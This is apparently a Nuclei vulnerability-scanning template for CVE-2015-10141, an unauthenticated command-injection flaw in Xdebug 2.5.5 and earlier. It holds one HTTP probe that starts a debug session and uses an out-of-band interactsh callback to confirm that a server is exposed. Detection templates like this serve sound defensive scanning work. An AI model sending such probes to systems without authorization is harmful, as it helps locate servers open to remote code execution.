id: CVE-2015-10141
info:
name: Xdebug <= 2.5.5 - Command Injection
author: pwnhxl
severity: critical
description: |
Xdebug <= 2.5.5 contains an unauthenticated command injection caused by accepting debugger protocol commands without authentication when remote debugging is enabled, letting remote attackers execute arbitrary PHP code and system commands, exploit requires remote debugging enabled.
reference:
- https://github.com/vulhub/vulhub/tree/master/php/xdebug-rce
- https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/
- https://paper.seebug.org/397/
- https://github.com/D3Ext/XDEBUG-Exploit
- https://www.exploit-db.com/exploits/44568
- https://www.vulncheck.com/advisories/xdebug-remote-debugger-unauth-os-command-execution
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
cve-id: CVE-2015-10141
cwe-id: CWE-78
epss-score: 0.74887
epss-percentile: 0.98801
metadata:
verified: true
max-request: 1
tags: cve,cve2015,oast,rce,vulhub,php,debug,xdebug,intrusive,vuln
http:
- raw:
- |
GET /?XDEBUG_SESSION_START={{randstr}} HTTP/1.1
Host: {{Hostname}}
X-Forwarded-For: {{interactsh-url}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: header
words:
- 'Set-Cookie: XDEBUG_SESSION={{randstr}}'
- type: status
status:
- 200
# digest: 4a0a00473045022100d047c248b08cbc655c3949a091ca7023892b9c1afaa5b64c2a528f5245b1837c022059dbfb7fd607432fb988d103a8cb05795a88cfd2b7caf7d1c515ebab48f48140:922c64590222798bb761d5b6d8e72950